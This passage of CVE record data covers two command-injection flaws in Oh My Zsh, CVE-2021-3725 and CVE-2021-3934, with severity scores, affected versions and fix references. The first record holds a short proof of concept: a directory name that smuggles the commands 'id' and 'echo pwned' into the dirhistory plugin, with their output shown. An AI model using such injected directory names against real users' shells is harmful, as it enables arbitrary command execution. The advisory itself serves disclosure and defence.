},
"exploit": [
{
"lang": "en",
"value": "Exploit PoC:\n\n1. Install Oh My Zsh.\n2. Enable the dirhistory plugin.\n3. Open a terminal and create and cd into a directory like so:\n\n baddir=\"directory\u0027;id;echo \u0027pwned\"\n mkdir \"$baddir\" \u0026\u0026 cd \"$baddir\"\n\n4. Press Alt-Left to go back to previous directory (in macOS, use Option-Left).\n\n5. id and echo pwned are executed:\n\n $ \u003cAlt-Left\u003e\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n pwned"
}
],
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2021-3725",
"datePublished": "2021-11-30T09:30:14",
"dateReserved": "2021-08-19T00:00:00",
"dateUpdated": "2024-08-03T17:01:08.297Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-3934 (GCVE-0-2021-3934)
Vulnerability from cvelistv5 – Published: 2021-11-12 11:45 – Updated: 2024-08-03 17:09
Title
OS Command Injection in ohmyzsh/ohmyzsh
Summary
ohmyzsh is vulnerable to Improper Neutralization of Special Elements used in an OS Command
Severity
7.8 (High)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command
Impacted products
| Vendor | Product | Version |
|---|---|---|
| ohmyzsh | ohmyzsh/ohmyzsh | Affected: unspecified, < 6cb41b70a6d04301fd50cd5862ecd705ba226c0e (custom) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T17:09:09.615Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://huntr.dev/bounties/ad2b5c3f-a3ce-4407-94dc-354c723310ce"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/6cb41b70a6d04301fd50cd5862ecd705ba226c0e"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ohmyzsh/ohmyzsh",
"vendor": "ohmyzsh",
"versions": [
{
"lessThan": "6cb41b70a6d04301fd50cd5862ecd705ba226c0e",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ohmyzsh is vulnerable to Improper Neutralization of Special Elements used in an OS Command"
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-12T11:45:10",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://huntr.dev/bounties/ad2b5c3f-a3ce-4407-94dc-354c723310ce"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/6cb41b70a6d04301fd50cd5862ecd705ba226c0e"
}
],
"source": {
"advisory": "ad2b5c3f-a3ce-4407-94dc-354c723310ce",
"discovery": "EXTERNAL"
},
"title": "OS Command Injection in ohmyzsh/ohmyzsh",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3934",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "6cb41b70a6d04301fd50cd5862ecd705ba226c0e"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "ohmyzsh is vulnerable to Improper Neutralization of Special Elements used in an OS Command"
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 Improper Neutralization of Special Elements used in an OS Command"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://huntr.dev/bounties/ad2b5c3f-a3ce-4407-94dc-354c723310ce",
"refsource": "CONFIRM",
"url": "https://huntr.dev/bounties/ad2b5c3f-a3ce-4407-94dc-354c723310ce"
},
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/6cb41b70a6d04301fd50cd5862ecd705ba226c0e",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/6cb41b70a6d04301fd50cd5862ecd705ba226c0e"
}
]
},
"source": {
"advisory": "ad2b5c3f-a3ce-4407-94dc-354c723310ce",
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2021-3934",
"datePublished": "2021-11-12T11:45:10",
"dateReserved": "2021-11-08T00:00:00",
"dateUpdated": "2024-08-03T17:09:09.615Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}